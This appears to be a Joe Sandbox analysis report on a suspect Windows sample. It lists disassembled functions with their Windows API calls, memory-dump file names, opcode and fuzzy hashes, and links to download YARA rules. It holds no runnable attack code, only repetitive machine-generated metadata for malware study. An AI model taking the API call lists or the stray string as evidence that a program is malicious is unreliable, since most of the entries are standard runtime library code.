Opcode ID: 10de9e3bd2714ef8277a258abf0607de991affef6856523abf07f0d97aad6961
Instruction ID: c250d8a884a658b99c0d2035174db5b0fd78ec474ceeb32411beb021a5e0a2fa
Opcode Fuzzy Hash: 10de9e3bd2714ef8277a258abf0607de991affef6856523abf07f0d97aad6961
Instruction Fuzzy Hash: 6F11023A6003095FDB18DF38C9A15BABBA1FF80368B14842CEA8787A50D375A942D780

Function 00FFC91A Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00FFC6B4,00000000,00000000,?), ref: 00FFC946

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 54425b636756422b999771d5b7d5960141ec27801a6649084fc119ded8f53d47
Instruction ID: 9316f7991ad24251d3b7e21c5312816f91e75c2b91f4a91ecef1779038b725d9
Opcode Fuzzy Hash: 54425b636756422b999771d5b7d5960141ec27801a6649084fc119ded8f53d47
Instruction Fuzzy Hash: 71F0A93390012DBBDB3897658D05BBABB58EF40764F154428EE46A3194DAB4FE41E6D0

Function 00FFC40D Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(00FFC6EB,00000001,?,?,-00000050,?,00FFCA8D,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00FFC457

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: dcc1551d4275aa4366aef708b24631cb7efebcf1f1bf4868a71bf13207f55b26
Instruction ID: 93a7b9564e2c77a38e8a6787b03091525175c914fea6ce2c2c9801a3fdfdd208
Opcode Fuzzy Hash: dcc1551d4275aa4366aef708b24631cb7efebcf1f1bf4868a71bf13207f55b26
Instruction Fuzzy Hash: 9EF0283220030C5FC7149F34DC91A76BB90FF80768F04802CFA458B6A0C2719C01E684

Function 00FF5D7F Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00FEDDC1: EnterCriticalSection.KERNEL32(?,?,00FF04BC,00000000,0100C190,0000000C,00FF0483,?,?,00FF3495,?,?,00FF50F6,00000001,00000364,00000002), ref: 00FEDDD0

EnumSystemLocalesW.KERNEL32(00FF5D72,00000001,0100C3A0,0000000C,00FF6127,00000000), ref: 00FF5DB7

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: b8da9bbac59c9450107e5c77de1afb273fbb6cd49ca9fcab6e926a3c35b3ed44
Instruction ID: fd4176ec8cd57db64d5b12e8866d0745dcee4892e2dfd64bc48d8f05967cca26
Opcode Fuzzy Hash: b8da9bbac59c9450107e5c77de1afb273fbb6cd49ca9fcab6e926a3c35b3ed44
Instruction Fuzzy Hash: B6F04F72A04304DFD711EF98E842BAD77B0EB44721F10411AF645DB291C77A5940DB81

Function 00FFC327 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(00FFC280,00000001,?,?,?,00FFCAEB,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00FFC35E

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: a33df901aa2dd4a96294f26e0d310aa99c918624f93283f69a77f203605d6fd3
Instruction ID: bd797b4b400cc23cec532cd54ee264600c97ef9383a085654ffe087c05cfccbf
Opcode Fuzzy Hash: a33df901aa2dd4a96294f26e0d310aa99c918624f93283f69a77f203605d6fd3
Instruction Fuzzy Hash: 8FF0553670020C57CB159F75CC05A7ABF90FFC1B60F068058EB098B6A0C2369842E7D0

Function 00FF622B Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00FF23AE,?,20001004,00000000,00000002,?,?,00FF19B0), ref: 00FF625F

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 008611c7ebe7e20e70663a86778916f82dae92d5cf817b94a95b424736a2fa3d
Instruction ID: f4f4a5ede1ee505f730929aa5fe8320eb11d21d2945134843a31b558ccb2d25b
Opcode Fuzzy Hash: 008611c7ebe7e20e70663a86778916f82dae92d5cf817b94a95b424736a2fa3d
Instruction Fuzzy Hash: C0E01A3250022CBBDF236F60DC08AAE7A2AAF44B60F008010FA45A5221CB768D20AB91

Function 00FE7AAF Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00007ABB,00FE6DC9), ref: 00FE7AB4

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: f0e5ba117f06a7127ada7dea6b74f8f6d5ef63b9acaf9ba025a5e0da0095ea61
Instruction ID: 645f7ced57b083edb81fef9d7a6109fd111dfbaea2cbd6ffcd7177b3b3f1b4ac
Opcode Fuzzy Hash: f0e5ba117f06a7127ada7dea6b74f8f6d5ef63b9acaf9ba025a5e0da0095ea61
Instruction Fuzzy Hash:

Function 00FE1D79 Relevance: 1.4, Strings: 1, Instructions: 156COMMON

Download Yara Rule

Strings

Z81xbyuAua, xrefs: 00FE1E9B

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID:
String ID: Z81xbyuAua
API String ID: 0-3121583705
Opcode ID: 3947cd60ce134a086a639f1dabd98e7758607c93976cd30477438ddc33140438
Instruction ID: 118ff351bc05f9c4ef7061a0637340efd55dc7ed98dcf221fd9982f2a4e3b08e
Opcode Fuzzy Hash: 3947cd60ce134a086a639f1dabd98e7758607c93976cd30477438ddc33140438
Instruction Fuzzy Hash: AE412E77E2056B4BDB0CEEBAC8561AFBB69F745320B04427AED11DB3D1E2349A01D6D0

Function 00FFCC4B Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00FFCC4B

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: cda714a2eb679428f677b8ccb2edf6beba8a88ee623fc55de7f79442d1666abc
Instruction ID: f0abf93ec52a9cfb13c054672e1e96f8b0732eda89049242a1e13cb1765ce1f5
Opcode Fuzzy Hash: cda714a2eb679428f677b8ccb2edf6beba8a88ee623fc55de7f79442d1666abc
Instruction Fuzzy Hash: 29A02430101300CF4311CF34570534D37F5750C1C070440145140C4004D73F40405F00

Function 00FFBB36 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID: Process$CurrentFeatureInfoLocalePresentProcessorTerminate
String ID:
API String ID: 529751463-0
Opcode ID: f745935bfbb37dc75791c7ae4b53f04cc0a936550396e67d8f4577171c380a3d
Instruction ID: daa0dfacc37d1a2b9c7c632930d66e90533683c59df4182e2f398c23b3be731f
Opcode Fuzzy Hash: f745935bfbb37dc75791c7ae4b53f04cc0a936550396e67d8f4577171c380a3d
Instruction Fuzzy Hash: 07B11B759007498BDB349F25CC91BBBB3A8EF44318F14442DEB87C65A0EB75E945EB10

Function 00FFA64C Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d30a52f00f890bd01d6e84b1357bca7669443c8ff688bb46904ed1c21e63159d
Instruction ID: 563399e7c3e2ff4ab027991fe744f0e69f442e8e873150f57e7a83b4f9421586
Opcode Fuzzy Hash: d30a52f00f890bd01d6e84b1357bca7669443c8ff688bb46904ed1c21e63159d
Instruction Fuzzy Hash: 18E08C7292123CEBCB14DB98C904D9AF3ECEB44B10B250496B605D3220CA74EE00D7D0

Function 01026628 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90

Function 00FE2003 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693715e51ec2e97e8cf9ed5ae9c7a018b146cb4fa08be8804c3ddfc64f2e1c6d
Instruction ID: 91f92edb19adae3be2c3ba70702fa17e6347925f98ee54e5adb9b3853c75a091
Opcode Fuzzy Hash: 693715e51ec2e97e8cf9ed5ae9c7a018b146cb4fa08be8804c3ddfc64f2e1c6d
Instruction Fuzzy Hash: 35D0953A601A149FC720CF09E040942F7B9FB99630B1681A6E944A3B24C335FC02CAE0

Function 00FF0F2E Relevance: .0, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f509db719341cefea6c6c824f556d87c4149af31b656ab04d21882e9f704e7b0
Instruction ID: 3092814dc700fc24dd90dfb66a1bf3389d133ce6d412b5cf687e669b65c8b71b
Opcode Fuzzy Hash: f509db719341cefea6c6c824f556d87c4149af31b656ab04d21882e9f704e7b0
Instruction Fuzzy Hash: CCC08C7840090886CE398A10C2F13B43355EBA2792F8404CCDE1A4B7A3C91E9C82FA01

Function 00FEA5C8 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 303
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

type_info::operator==.LIBVCRUNTIME ref: 00FEA6E7
___TypeMatch.LIBVCRUNTIME ref: 00FEA7F5
CallUnexpected.LIBVCRUNTIME ref: 00FEA962

Strings

csm, xrefs: 00FEA605
csm, xrefs: 00FEA672
csm, xrefs: 00FEA71E

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID: CallMatchTypeUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 1206542248-393685449
Opcode ID: f386a40da3711e367ba78aa678ba2bb4a7329f0e9d5ed8cec8599f6d271ad4e9
Instruction ID: 0086dfc8ce78b4a014770c9ac4d1c53ece8c559a99dec190661648230e79d733
Opcode Fuzzy Hash: f386a40da3711e367ba78aa678ba2bb4a7329f0e9d5ed8cec8599f6d271ad4e9
Instruction Fuzzy Hash: E8B18C31C00289DFCF15DFA6C8819AEBBB5BF14320F15416AE8116B212D735EA52EB92

Function 00FF5F4A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,F8250000,?,558E5182,?,00FF6057,00FEC446,?,F8250000,00000000), ref: 00FF600B

Strings

ext-ms-, xrefs: 00FF5FB5
api-ms-, xrefs: 00FF5FA1

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 5dd934a5b859b81ff738b66c5fa3238212af575cb6c5407f2b116095406fdf66
Instruction ID: 1878dea1e3a6cd1e23cfae8212c9089bc5f012798330c501bc90eee636534f0b
Opcode Fuzzy Hash: 5dd934a5b859b81ff738b66c5fa3238212af575cb6c5407f2b116095406fdf66
Instruction Fuzzy Hash: 61210832E01618ABDB32DB259C40A7A3758AF41B70F210254FB56AB2D0EA75ED00E7E0

Function 00FFF356 Relevance: 9.3, APIs: 6, Instructions: 298
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa6bd48af1150fb757e03070fc12628e355727d2bde61c0e70dd6d2bedc73b10
Instruction ID: db52aeea35a9b8d8b146a2e03c21f5880dedd35ba007cad77048cce4e69b2898
Opcode Fuzzy Hash: aa6bd48af1150fb757e03070fc12628e355727d2bde61c0e70dd6d2bedc73b10
Instruction Fuzzy Hash: 5AB1F271E0024D9FDB21DFA9C880BBE7BB1AF45310F144169E6109B2B2DBB99D05EB61

Function 00FE53B1 Relevance: 9.1, APIs: 6, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 00FE53B8
std::_Lockit::_Lockit.LIBCPMT ref: 00FE53C2
int.LIBCPMT ref: 00FE53D9

Part of subcall function 00FE16B4: std::_Lockit::_Lockit.LIBCPMT ref: 00FE16C5
Part of subcall function 00FE16B4: std::_Lockit::~_Lockit.LIBCPMT ref: 00FE16DF

std::_Facet_Register.LIBCPMT ref: 00FE5413
std::_Lockit::~_Lockit.LIBCPMT ref: 00FE5433
Concurrency::cancel_current_task.LIBCPMT ref: 00FE5440

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 843e086f527065762f84946c75fa0c7000d81ab5b670f6eaaaf8e3a4cb12f40f
Instruction ID: a70fd5ac08451d80f1e4bef845c3df8bb2c4f2fcc8529d47c1342117a07c2209
Opcode Fuzzy Hash: 843e086f527065762f84946c75fa0c7000d81ab5b670f6eaaaf8e3a4cb12f40f
Instruction Fuzzy Hash: 4711E1719107949FCB25EF66CC057AE77B5BF84724F14050DF841AB281DF78AD00AB91

Function 00FEA25A Relevance: 9.1, APIs: 6, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,00FEA251,00FE8978,00FE7AFF), ref: 00FEA268
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00FEA276
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00FEA28F
SetLastError.KERNEL32(00000000,00FEA251,00FE8978,00FE7AFF), ref: 00FEA2E1

Memory Dump Source

Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 396004d7e480b2d9a361d4df1795a5cdcc58bf61d10bb2776bdd5d34e990fe1d
Instruction ID: f8a8780b6ba4c172b737dc1f23731fc0300c9a1010b85081fbd0d396c7677407
Opcode Fuzzy Hash: 396004d7e480b2d9a361d4df1795a5cdcc58bf61d10bb2776bdd5d34e990fe1d
